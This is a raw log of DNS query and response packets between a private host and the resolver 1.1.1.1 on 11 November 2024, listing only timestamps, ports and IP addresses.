Nov 11, 2024 18:13:11.849319935 CET	62735	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:11.849733114 CET	52920	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:11.852325916 CET	51949	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:11.853288889 CET	61437	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:11.853884935 CET	49880	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:11.854726076 CET	53	62553	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:11.858997107 CET	53	51949	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:11.859141111 CET	53	62735	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:11.859337091 CET	53	52920	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:11.863146067 CET	53	61437	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:11.864526987 CET	53	49880	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:11.874237061 CET	52936	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:11.874397993 CET	54380	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:11.874634027 CET	64593	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:11.874802113 CET	53183	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:11.875186920 CET	53033	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:11.875339031 CET	56459	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:11.875653982 CET	61900	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:11.875804901 CET	59565	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:11.876044989 CET	65289	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:11.876194000 CET	64489	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:11.876564980 CET	58959	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:11.876734018 CET	50766	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:11.877048016 CET	63968	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:11.877496958 CET	59395	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:11.878812075 CET	53	56219	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:11.881738901 CET	53	64593	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:11.883873940 CET	53	53183	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:11.884197950 CET	53	52936	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:11.884969950 CET	53	56459	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:11.884982109 CET	53	53033	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:11.885392904 CET	53	64489	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:11.885695934 CET	53	65289	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:11.887810946 CET	53	59395	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:11.888006926 CET	53	50766	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:11.889401913 CET	53	58959	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:11.892905951 CET	53	54380	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:11.894145012 CET	62442	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:11.894836903 CET	55624	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:11.895004988 CET	62343	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:11.895270109 CET	52239	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:11.897265911 CET	61985	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:11.900412083 CET	64806	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:11.904047012 CET	53	55624	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:11.905361891 CET	53	62442	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:11.905715942 CET	53	62343	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:11.906930923 CET	53	63968	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:11.907300949 CET	53	59565	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:11.909528017 CET	53	64806	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:12.109793901 CET	50286	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:12.125233889 CET	54253	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:12.125672102 CET	51782	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:12.125849009 CET	64366	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:12.126183987 CET	49288	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:12.126656055 CET	53635	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:12.126811028 CET	59234	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:12.126964092 CET	57079	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:12.127110004 CET	58138	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:12.127340078 CET	64593	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:12.127466917 CET	60266	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:12.127940893 CET	52638	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:12.132618904 CET	56703	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:12.132819891 CET	64138	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:12.133174896 CET	52173	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:12.134609938 CET	53592	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:12.134870052 CET	54827	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:12.135229111 CET	50627	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:12.782835007 CET	63583	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:12.876529932 CET	61900	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:12.907783985 CET	61985	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:12.907840014 CET	52239	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:12.960150957 CET	53	52239	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:12.961061001 CET	53	61985	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:12.961077929 CET	53	63583	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:12.961839914 CET	53	61900	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:12.971543074 CET	53	52638	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:12.971860886 CET	53	60266	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:12.971873045 CET	53	61900	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:12.971916914 CET	53	61985	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:12.971983910 CET	53	58138	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:12.972207069 CET	53	63583	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:12.972260952 CET	53	50286	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:12.972270966 CET	53	52239	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:12.972413063 CET	53	64593	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:12.972424030 CET	53	52173	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:12.972924948 CET	53	54827	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:12.972935915 CET	53	51782	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:12.972948074 CET	53	59234	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:12.973057985 CET	53	49288	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:12.979659081 CET	53	64138	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:12.986020088 CET	53	53592	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:12.993453979 CET	53	64366	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:12.993510008 CET	53	54253	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:12.993597984 CET	53	57079	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:12.993865967 CET	53	53635	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:12.999545097 CET	53	50627	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:13.116051912 CET	53	56703	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:13.538734913 CET	49866	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:13.770032883 CET	50924	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:13.877888918 CET	53	49866	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:14.105432034 CET	53	50924	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:14.985619068 CET	49449	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:14.987663984 CET	53402	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:14.988095999 CET	65297	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:14.989255905 CET	59965	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:14.990083933 CET	64000	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:14.994093895 CET	60353	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:14.994191885 CET	51285	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:14.997764111 CET	53	49449	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:14.998370886 CET	53	53402	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.001090050 CET	53	64000	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.004494905 CET	53	59965	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.005635977 CET	53	51285	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.014750004 CET	56816	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.015290022 CET	53	60353	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.015819073 CET	51170	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.016026020 CET	52322	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.016330004 CET	59266	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.017013073 CET	52172	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.019098997 CET	62547	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.023699999 CET	53	65297	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.024396896 CET	53	56816	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.024844885 CET	63950	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.025855064 CET	53	51170	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.027493000 CET	53	52322	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.027503967 CET	53	52172	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.036501884 CET	53	63950	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.036915064 CET	55469	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.046622992 CET	53	55469	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.047010899 CET	53	59266	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.051929951 CET	53	62547	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.060178995 CET	56566	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.069538116 CET	53	56566	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.086448908 CET	61223	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.087218046 CET	63612	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.087801933 CET	55781	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.088470936 CET	49682	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.090010881 CET	50547	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.090385914 CET	62916	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.090861082 CET	52112	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.091530085 CET	51615	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.091897011 CET	63843	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.092200041 CET	55722	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.092442989 CET	56426	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.092935085 CET	52090	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.093346119 CET	61992	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.093688965 CET	53892	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.093877077 CET	57768	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.094329119 CET	61452	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.094506025 CET	57557	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.095033884 CET	56255	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.095612049 CET	59000	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.096026897 CET	53	61223	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.099330902 CET	53	55722	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.100287914 CET	53	50547	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.100760937 CET	53	55781	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.100775003 CET	53	52112	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.102025032 CET	53	61452	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.102088928 CET	53	52090	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.103219986 CET	53	56426	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.103799105 CET	53	57557	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.104433060 CET	53	57768	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.110183001 CET	53	53892	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.117600918 CET	53	63612	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.119544983 CET	53	49682	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.120610952 CET	53	62916	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.123120070 CET	53	63843	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.124356985 CET	53	51615	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.124366999 CET	53	61992	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.125483036 CET	53	59000	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.128022909 CET	53	56255	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.171886921 CET	64304	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.174132109 CET	55555	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.174468994 CET	56844	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.174639940 CET	56261	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.184725046 CET	53	56261	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.191541910 CET	53	56844	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.203906059 CET	53	64304	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.205862045 CET	53	55555	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.208836079 CET	59259	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.209039927 CET	52633	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.215931892 CET	61238	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.216207027 CET	54234	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.216664076 CET	63513	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.218756914 CET	63491	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.219135046 CET	54530	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.219168901 CET	53	59259	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.219307899 CET	64615	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.219444036 CET	52761	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.220017910 CET	56148	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.220242023 CET	53351	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.220453978 CET	55191	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.220453978 CET	54366	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.220700026 CET	54549	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.220874071 CET	50719	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.221100092 CET	55044	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.221260071 CET	62180	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.221471071 CET	54167	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.221869946 CET	61309	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.222080946 CET	65267	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.222395897 CET	50663	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.222704887 CET	55630	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.222929001 CET	63234	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.225310087 CET	60329	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.225454092 CET	51095	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.225939989 CET	53	61238	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.230304956 CET	53	50719	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.230437040 CET	53	53351	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.230608940 CET	53	54549	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.230881929 CET	53	55044	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.231163025 CET	53	54167	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.231175900 CET	53	62180	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.231302977 CET	53	56148	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.232372999 CET	53	63234	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.232402086 CET	53	55630	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.232896090 CET	53	65267	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.234870911 CET	53	51095	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.236942053 CET	53	64615	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.238033056 CET	53	55191	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.239419937 CET	53	52633	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.247252941 CET	53	54234	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.247301102 CET	53	63513	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.251007080 CET	53	54530	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.251020908 CET	53	63491	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.251303911 CET	53	54366	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.252234936 CET	53	52761	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.253130913 CET	53	61309	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.253142118 CET	53	50663	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.257508993 CET	53	60329	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.727499008 CET	62374	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.727660894 CET	50766	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.728368044 CET	60136	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.728368044 CET	60416	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.733819008 CET	58681	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.733922958 CET	55294	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.735143900 CET	50423	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.738058090 CET	53	60416	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.739895105 CET	53	50766	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.739907980 CET	53	60136	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.743915081 CET	52296	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.750824928 CET	52613	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.751467943 CET	57569	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.754136086 CET	53	50423	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.758708954 CET	53	62374	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.761418104 CET	53	52613	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.762825966 CET	53918	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.763180971 CET	53	57569	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.763643980 CET	52435	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.764081955 CET	63996	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.767030001 CET	53	55294	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.767869949 CET	53	58681	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.772142887 CET	50346	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.772901058 CET	53	53918	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.774689913 CET	53	63996	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.776909113 CET	53	52296	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.784113884 CET	53	50346	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.788175106 CET	52617	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.793657064 CET	59125	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.793838978 CET	59255	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.795253038 CET	53	52435	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.797879934 CET	61055	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.797909021 CET	58270	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.798305035 CET	50783	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.799618006 CET	53	52617	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.800679922 CET	55502	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.803045034 CET	50102	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.803663969 CET	49668	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.804044008 CET	53	59125	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.804292917 CET	59482	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.805147886 CET	53	59255	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.806174040 CET	54906	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.806925058 CET	53683	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.807177067 CET	53	61055	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.807208061 CET	53	58270	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.809609890 CET	56139	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.809784889 CET	65064	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.811649084 CET	53	50783	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.811661959 CET	53	55502	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.814521074 CET	53	49668	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.817318916 CET	53	53683	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.820235968 CET	53	56139	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.821144104 CET	53	65064	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.835822105 CET	53	59482	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.842166901 CET	63512	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.843534946 CET	53	50102	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.846038103 CET	62356	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.846766949 CET	61737	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.847090006 CET	58738	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.847290993 CET	59198	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.847479105 CET	51719	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.849185944 CET	55354	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.849411964 CET	63840	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.850152016 CET	65101	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.850337029 CET	49548	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.850492954 CET	60053	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.850661993 CET	51593	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.850837946 CET	54753	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.850991964 CET	61576	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.851152897 CET	52216	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.851367950 CET	53043	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.851527929 CET	57694	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.851671934 CET	57777	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.851887941 CET	56077	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.852113008 CET	49369	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.852461100 CET	62089	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.852632999 CET	58733	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.852749109 CET	53	63512	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.852804899 CET	50913	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.852962017 CET	63851	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.853467941 CET	59945	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.853646994 CET	64649	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.854269981 CET	53296	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.854336977 CET	57630	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.857155085 CET	53	51719	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.858198881 CET	53	58738	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.859885931 CET	53	65101	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.860203981 CET	53	49548	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.860831976 CET	53	63851	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.860845089 CET	53	54753	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.860857010 CET	53	61576	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.861300945 CET	53	51593	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.861938953 CET	53	57777	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.862792015 CET	53	62089	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.862827063 CET	53	53043	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.862936974 CET	53	50913	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.863599062 CET	53	64649	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.863831043 CET	53	56077	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.863858938 CET	53	59945	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.864216089 CET	53	62356	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.865165949 CET	53	53296	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.868539095 CET	53993	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.868628979 CET	53	61737	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.868841887 CET	56555	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.869524002 CET	53	60053	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.869626999 CET	57707	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.870423079 CET	51304	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.870585918 CET	51224	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.870970011 CET	49307	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.874783993 CET	56680	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:15.875032902 CET	56432	53	192.168.2.6	1.1.1.1
